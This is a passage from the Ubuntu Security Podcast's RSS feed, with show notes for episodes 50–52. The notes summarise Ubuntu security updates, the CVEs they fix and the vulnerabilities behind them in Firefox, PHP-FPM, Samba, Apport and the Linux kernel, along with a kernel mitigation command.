(some pages with dynamic javascript would fail to load - v 70.0 had
enabled a new next-gen local storage feature which caused issues so this
is now disabled by default)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-news-that-14-dot-04-esm-is-free-for-personal-use-via-new-ua-client-08-19">Alex and Joe discuss news that 14.04 ESM is free for personal use via new UA client [08:19]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/ua-services-deployed-from-the-command-line-with-ua-client">https://ubuntu.com/blog/ua-services-deployed-from-the-command-line-with-ua-client</a></li>
<li><a href="https://ubuntu.com/esm">https://ubuntu.com/esm</a></li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/ESM/14.04">https://wiki.ubuntu.com/SecurityTeam/ESM/14.04</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E052.mp3" length="23822197" type="audio/mpeg" /><itunes:duration>18:24</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 51
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-51/</link>
          <pubDate>Thu, 31 Oct 2019 18:00:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>b4b70514b6fc0095396ed3af2215ac25ed8c1c5f3aeec38a2e93b800831fc26e997456bb3bee80dd083570aed5b4bc12cc1e96fbd11999a6621945f7b6130794</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 51</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          In this Halloween Special, Joe and Alex talk about what scares them in
  security, plus we look at security updates for Firefox, PHP, Samba,
  Whoopsie, Apport and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  In this Halloween Special, Joe and Alex talk about what scares them in
  security, plus we look at security updates for Firefox, PHP, Samba,
  Whoopsie, Apport and more.
  </itunes:summary>
        <description>  In this Halloween Special, Joe and Alex talk about what scares them in
  security, plus we look at security updates for Firefox, PHP, Samba,
  Whoopsie, Apport and more.
  </description>
        <googleplay:description>  In this Halloween Special, Joe and Alex talk about what scares them in
  security, plus we look at security updates for Firefox, PHP, Samba,
  Whoopsie, Apport and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>In this Halloween Special, Joe and Alex talk about what scares them in
security, plus we look at security updates for Firefox, PHP, Samba,
Whoopsie, Apport and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>26 unique CVEs addressed</p>
<h3 id="usn-4165-1-firefox-vulnerabilities-00-46">[<a href="https://usn.ubuntu.com/4165-1/">USN-4165-1</a>] Firefox vulnerabilities [00:46]</h3>
<ul>
<li>13 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17002">CVE-2019-17002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17001">CVE-2019-17001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17000">CVE-2019-17000</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15903">CVE-2019-15903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11765">CVE-2019-11765</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11764">CVE-2019-11764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11763">CVE-2019-11763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11762">CVE-2019-11762</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11761">CVE-2019-11761</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11760">CVE-2019-11760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11759">CVE-2019-11759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11757">CVE-2019-11757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-6156">CVE-2018-6156</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 high priority, 11 medium and 1 low
<ul>
<li>Heap buffer overflow via a crafted WebRTC video - originally for
Chromium and was fixed for that last year - Firefox suffered similarly
but disables the feature by default - has finally been fixed for
Firefox as well by integrating the original fix from Chromium</li>
<li>Usual suspects of stack-based buffer overflows, UAFs, a heap buffer
overflow in bundled expat (<a href="https://ubuntusecuritypodcast.org/episode-47/">Episode 47</a>),</li>
</ul>
</li>
</ul>
<h3 id="usn-4166-1-usn-4166-2-php-vulnerability-02-10">[<a href="https://usn.ubuntu.com/4166-1/">USN-4166-1</a>, <a href="https://usn.ubuntu.com/4166-2/">USN-4166-2</a>] PHP vulnerability [02:10]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11043">CVE-2019-11043</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>RCE in PHP (FPM - FastCGI Process Manager) - possible to cause the FPM
module to write past allocated buffers - and so ends up also writing into the FCGI
protocol data buffers - which can then create a chance for RCE</li>
<li>Exploit on github targetting vulnerable PHP-FPM servers which use nginx
in a particular configuration</li>
</ul>
<h3 id="usn-4167-1-usn-4167-2-samba-vulnerabilities-03-11">[<a href="https://usn.ubuntu.com/4167-1/">USN-4167-1</a>, <a href="https://usn.ubuntu.com/4167-2/">USN-4167-2</a>] Samba vulnerabilities [03:11]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14847">CVE-2019-14847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14833">CVE-2019-14833</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10218">CVE-2019-10218</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS from a user with &ldquo;get changes&rdquo; permissions - could crash an AD DC
LDAP server due to a NULL pointer deref when using dirsync with ranged results</li>
<li>Can configure AD DC to call out to a custom command to verify password
complexity - is handed a copy of the cleartext password - but if this
contained any multi-byte characters, would not get the full password -
since it would pass the password as bytes but only copy the number of
characters - and since multi-byte characters take more than 1 byte would
miss the last few bytes of the password - so could circumvent password
complexity requirements</li>
<li>Malicious server could craft filenames which contain relative path
characters (../ etc) which would then cause an SMB client to access local
files for reading / writing rather than remote files - so a remote server
could cause a client to create files outside the working directory on the
local machine</li>
</ul>
<h3 id="usn-4168-1-libidn2-vulnerabilities-05-15">[<a href="https://usn.ubuntu.com/4168-1/">USN-4168-1</a>] Libidn2 vulnerabilities [05:15]</h3>
<ul>
<li>2 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18224">CVE-2019-18224</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12290">CVE-2019-12290</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Library for handling internationalised domain names</li>
<li>Heap based buffer overflow via a too-long domain name (greater than 63
characters - in library, caller passes a buffer that is specified to be a
minimum of 64 bytes - but libidn strcpy()&rsquo;s into it so could easily overflow.</li>
<li>Possible domain name impersonation since doesn&rsquo;t bother to check unicode
conversions - so could use punycode (ascii representation of certain
unicode characters) to impersonate a unicode domain</li>
</ul>
<h3 id="usn-4169-1-libarchive-vulnerability-06-32">[<a href="https://usn.ubuntu.com/4169-1/">USN-4169-1</a>] libarchive vulnerability [06:32]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18408">CVE-2019-18408</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in certain failure conditions when handling RAR archives</li>
</ul>
<h3 id="usn-4170-1-whoopsie-vulnerability-06-52">[<a href="https://usn.ubuntu.com/4170-1/">USN-4170-1</a>] Whoopsie vulnerability [06:52]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11484">CVE-2019-11484</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Kevin Backhouse from Semmle Security Research Team - integer oveflow -&gt;
heap based buffer overflow -&gt; code executions a whoopsie user</li>
</ul>
<h3 id="usn-4171-1-apport-vulnerabilities-07-51">[<a href="https://usn.ubuntu.com/4171-1/">USN-4171-1</a>] Apport vulnerabilities [07:51]</h3>
<ul>
<li>
<p>5 CVEs addressed in Xenial, Bionic, Disco, Eoan</p>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15790">CVE-2019-15790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11485">CVE-2019-11485</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11483">CVE-2019-11483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11482">CVE-2019-11482</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11481">CVE-2019-11481</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>
<p>Kevin Backhouse from Semmle Security Research Team</p>
<ul>
<li>reads /proc/PID files as root - so if can race on process ID reuse
could cause Apport to generate a crash dump of a privileged process
that is readable by a normal user (so starts dumping an unprivileged
process, then PID race, new PID as privileged user -&gt; this crashes -&gt;
Apport starts writing out the crash report for the first process but
using the details of the new privileged process - since this was
originally an unprivileged process, the crash dump is then unprivileged
too). Fixed by making sure Apport drops privileges to the original
unprivileged user before reading /proc/PID info so if this happens to
then be a different user&rsquo;s process will not be able to generate the
crash dump</li>
<li>Apport would read a per-user configuration file - but would do so as
root - and so this could be a symlink to a root owned file and Apport
would happily read it (but might error out if it looked invalid) - so
drop privileges to read it so it doesn&rsquo;t include anything which it
shouldn&rsquo;t in the final crash report</li>
</ul>
</li>
<li>
<p>Sander Bos</p>
<ul>
<li>Apport had a lock file in a world-writable directory - so anyone could
create it to either stop Apport running or to control the execution of
Apport over time - fixed to place in a non-world writable location
instead</li>
<li>When using containers, Apport uses a socket file to allow it to forward
crash dumps that it captured on the host to an Apport instance running
within a container containers - it finds the socket file from the host
using the /proc/PID/root magic link - but this could allow an
unprivileged user who (using unprivileged usernamespaces) is root in a
container to chroot() for a process in a container to a different
location so it can then intercept the crash dump of a privileged
process within the container - so could run a setuid process in the
container, and when it crashes be able to read it&rsquo;s crash dump</li>
<li>TOCCTOU race on PID (like above) but this is in a different code path -
reads the cwd of the crashed process to write out the core dump to this
location - but on process ID reuse this could then be in a different
location - so if a user can race against a privileged process dumping
the crash dump could end up in a location of their choosing</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-what-scares-them-for-halloween-12-38">Joe and Alex discuss what scares them for Halloween [12:38]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E051.mp3" length="39938765" type="audio/mpeg" /><itunes:duration>29:56</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 50
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-50/</link>
          <pubDate>Thu, 24 Oct 2019 15:28:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>1ac5b387f58f50b867a6d837f8d9a835c345e155c44b99ff9b2908d433b078520fce6a6a2591e83251e878e95e4937992d25f4f2092f884cdb47c1a102297bad</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 50</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Alex and Joe discuss the big news of this week - the release of Ubuntu
  19.10 Eoan Ermine - plus we look at updates for the Linux kernel, libxslt,
  UW IMAP and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Alex and Joe discuss the big news of this week - the release of Ubuntu
  19.10 Eoan Ermine - plus we look at updates for the Linux kernel, libxslt,
  UW IMAP and more.
  </itunes:summary>
        <description>  Alex and Joe discuss the big news of this week - the release of Ubuntu
  19.10 Eoan Ermine - plus we look at updates for the Linux kernel, libxslt,
  UW IMAP and more.
  </description>
        <googleplay:description>  Alex and Joe discuss the big news of this week - the release of Ubuntu
  19.10 Eoan Ermine - plus we look at updates for the Linux kernel, libxslt,
  UW IMAP and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Alex and Joe discuss the big news of this week - the release of Ubuntu
19.10 Eoan Ermine - plus we look at updates for the Linux kernel, libxslt,
UW IMAP and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>51 unique CVEs addressed</p>
<h3 id="usn-4156-2-sdl-vulnerabilities-00-37">[<a href="https://usn.ubuntu.com/4156-2/">USN-4156-2</a>] SDL vulnerabilities [00:37]</h3>
<ul>
<li>11 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7637">CVE-2019-7637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7636">CVE-2019-7636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7635">CVE-2019-7635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7578">CVE-2019-7578</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7577">CVE-2019-7577</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7576">CVE-2019-7576</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7575">CVE-2019-7575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7574">CVE-2019-7574</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7573">CVE-2019-7573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7572">CVE-2019-7572</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13616">CVE-2019-13616</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Covered in <a href="https://ubuntusecuritypodcast.org/episode-49/">Episode 49</a> and <a href="https://ubuntusecuritypodcast.org/episode-48/">Episode 48</a></li>
</ul>
<h3 id="usn-4160-1-uw-imap-vulnerability-01-04">[<a href="https://usn.ubuntu.com/4160-1/">USN-4160-1</a>] UW IMAP vulnerability [01:04]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19518">CVE-2018-19518</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>University of Washington IMAP toolkit (used by PHP for it&rsquo;s IMAP implementation)</li>
<li>Used rsh to implement various operations - wouldn&rsquo;t try and sanitize the
provided hostname - so if attacker could provide a hostname/mailbox to
php&rsquo;s IMAP without any validation could execute arbitrary commands on the
host
<ul>
<li>Fixed by turning off the rsh based functionality by default in PHP - if
you still want this you can set imap.enable_insecure_rsh but this is
not advised&hellip;</li>
</ul>
</li>
</ul>
<h3 id="usn-4158-1-libtiff-vulnerabilities-02-17">[<a href="https://usn.ubuntu.com/4158-1/">USN-4158-1</a>] LibTIFF vulnerabilities [02:17]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17546">CVE-2019-17546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14973">CVE-2019-14973</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow -&gt; heap based buffer overflow -&gt; crash, DoS or code
execution</li>
<li>(Low) Integer overflow due to undefined behaviour in existing overflow
checking code when multiplying various elements -&gt; no known way to
exploit</li>
</ul>
<h3 id="usn-4155-2-aspell-vulnerability-03-13">[<a href="https://usn.ubuntu.com/4155-2/">USN-4155-2</a>] Aspell vulnerability [03:13]</h3>
<ul>
<li>1 CVEs addressed in Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17544">CVE-2019-17544</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-49/">Episode 49</a> covered for older releases - Eoan is now out so updated there too</li>
</ul>
<h3 id="usn-4159-1-exiv2-vulnerability-03-31">[<a href="https://usn.ubuntu.com/4159-1/">USN-4159-1</a>] Exiv2 vulnerability [03:31]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17402">CVE-2019-17402</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read -&gt; crash, DoS</li>
</ul>
<h3 id="usn-4164-1-libxslt-vulnerabilities-03-44">[<a href="https://usn.ubuntu.com/4164-1/">USN-4164-1</a>] Libxslt vulnerabilities [03:44]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18197">CVE-2019-18197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13118">CVE-2019-13118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13117">CVE-2019-13117</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OSS-Fuzz found 3 issues
<ul>
<li>possible heap buffer overflow as a result of a dangling pointer - so
same memory area could be reused for future memory operations -&gt; fixed
to reset the pointer when done</li>
<li>2 low priority issues - both stack memory info disclosures</li>
</ul>
</li>
</ul>
<h3 id="usn-4157-1-usn-4157-2-linux-kernel-vulnerabilities-04-59">[<a href="https://usn.ubuntu.com/4157-1/">USN-4157-1</a>, <a href="https://usn.ubuntu.com/4157-2/">USN-4157-2</a>] Linux kernel vulnerabilities [04:59]</h3>
<ul>
<li>9 CVEs addressed in Bionic (HWE) and Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2181">CVE-2019-2181</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16714">CVE-2019-16714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15902">CVE-2019-15902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15505">CVE-2019-15505</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15504">CVE-2019-15504</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14821">CVE-2019-14821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14816">CVE-2019-14816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14815">CVE-2019-14815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14814">CVE-2019-14814</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow -&gt; buffer overflow -&gt; root privesc in binder</li>
<li>Reintroduction of Spectre v1 vulnerability in ptrace subsystem - Brad
Spengler - fixed properly in Linus&rsquo; tree but not when it got backported
to the stable tree - two lines of code got reordered - so load of
possible speculative value occurred _after_it had been used - so the
speculative load barrier had no effect - Ubuntu regularly backports fixes
from the latest stable tree so we ended up affected as well
<ul>
<li><a href="https://grsecurity.net/teardown_of_a_failed_linux_lts_spectre_fix.php">https://grsecurity.net/teardown_of_a_failed_linux_lts_spectre_fix.php</a></li>
</ul>
</li>
<li>Possible DoS (kernel crash) if users can write to /dev/kvm - by default
on Ubuntu users don&rsquo;t have this privilege so generally not affected</li>
<li>2 different heap based buffer overflows in Marvell Wifi driver -&gt;
occurred when setting parameters for the driver so could be triggered by
a local users -&gt; crash, DoS or
possible code execution</li>
</ul>
<h3 id="usn-4161-1-linux-kernel-vulnerability-07-40">[<a href="https://usn.ubuntu.com/4161-1/">USN-4161-1</a>] Linux kernel vulnerability [07:40]</h3>
<ul>
<li>1 CVEs addressed in Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18198">CVE-2019-18198</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Eoan kernel &ldquo;0-day&rdquo; - will discuss with Joe later</li>
</ul>
<h3 id="usn-4162-1-linux-kernel-vulnerabilities-07-58">[<a href="https://usn.ubuntu.com/4162-1/">USN-4162-1</a>] Linux kernel vulnerabilities [07:58]</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (Azure), Xenial (HWE), Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15918">CVE-2019-15918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15902">CVE-2019-15902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15505">CVE-2019-15505</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15118">CVE-2019-15118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15117">CVE-2019-15117</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14821">CVE-2019-14821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14816">CVE-2019-14816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14815">CVE-2019-14815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14814">CVE-2019-14814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-21008">CVE-2018-21008</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SMB based buffer overread if try mounting a share with version specified
as 3.0 but the share itself is version 2.10 -&gt; parameter size mismatch -&gt;
read of too much memory -&gt; info disclosure</li>
<li>UAF in RSI 91x Wi-Fi driver -&gt; able to be triggered by a remote network
peer -&gt; crash, DoS or possible RCE</li>
<li>ptrace spectrev1 reissue, KVM crash, Marvell Wifi Driver issues from above</li>
<li>USB audio issues from <a href="https://ubuntusecuritypodcast.org/episode-48/">Episode 48</a> (Disco kernel -&gt; now fixed in Bionic
kernel as well)</li>
</ul>
<h3 id="usn-4163-1-usn-4163-2-linux-kernel-vulnerabilities-09-29">[<a href="https://usn.ubuntu.com/4163-1/">USN-4163-1</a>, <a href="https://usn.ubuntu.com/4163-2/">USN-4163-2</a>] Linux kernel vulnerabilities [09:29]</h3>
<ul>
<li>10 CVEs addressed in Xenial and Trusty ESM (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15902">CVE-2019-15902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15505">CVE-2019-15505</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15118">CVE-2019-15118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15117">CVE-2019-15117</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14821">CVE-2019-14821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14816">CVE-2019-14816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14814">CVE-2019-14814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-21008">CVE-2018-21008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18232">CVE-2017-18232</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10906">CVE-2016-10906</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Spectrev1 reissue, USB Audio, KVM crash, Marvell and RSI 91x WiFi Driver
issues all covered earlier</li>
<li>Serial attached SCSI implementation mishandled error condition leading to
deadlock -&gt; local user could possibly trigger this leading to a DoS</li>
</ul>
<h3 id="lsn-0058-1-linux-kernel-vulnerability-10-09">[<a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-October/005162.html">LSN-0058-1</a>] Linux kernel vulnerability [10:09]</h3>
<ul>
<li>22 CVEs addressed in Bionic and Xenial + Xenial (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14835">CVE-2019-14835</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14821">CVE-2019-14821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14816">CVE-2019-14816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14815">CVE-2019-14815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14814">CVE-2019-14814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14284">CVE-2019-14284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14283">CVE-2019-14283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12614">CVE-2019-12614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11833">CVE-2019-11833</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11478">CVE-2019-11478</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11477">CVE-2019-11477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10207">CVE-2019-10207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10126">CVE-2019-10126</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3846">CVE-2019-3846</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2181">CVE-2019-2181</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2054">CVE-2019-2054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0136">CVE-2019-0136</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-21008">CVE-2018-21008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20976">CVE-2018-20976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20961">CVE-2018-20961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20856">CVE-2018-20856</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10905">CVE-2016-10905</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most all covered in previous episodes or previously in this episode</li>
<li>2 high priority issues
<ul>
<li>vhost_net issue from <a href="https://ubuntusecuritypodcast.org/episode-47/">Episode 47</a></li>
<li>SACKPanic from <a href="https://ubuntusecuritypodcast.org/episode-37/">Episode 37</a></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-on-ubuntu-19-dot-10--eoan-ermine--released-but-with-possible-local-user-kernel-dos-bug-11-02">Joe and Alex on Ubuntu 19.10 (Eoan Ermine) released but with possible local user kernel DoS bug [11:02]</h3>
<ul>
<li><a href="https://twitter.com/sylvia_ritter">https://twitter.com/sylvia_ritter</a></li>
<li><a href="https://www.phoronix.com/scan.php?page=news_item&amp;px=Ubuntu-19.10-Kernel-Bug">https://www.phoronix.com/scan.php?page=news_item&amp;px=Ubuntu-19.10-Kernel-Bug</a>
<ul>
<li>Mitigate by installing the latest eoan kernel update or by disabling
user namspaces:
sysctl user.max_user_namespaces=0</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
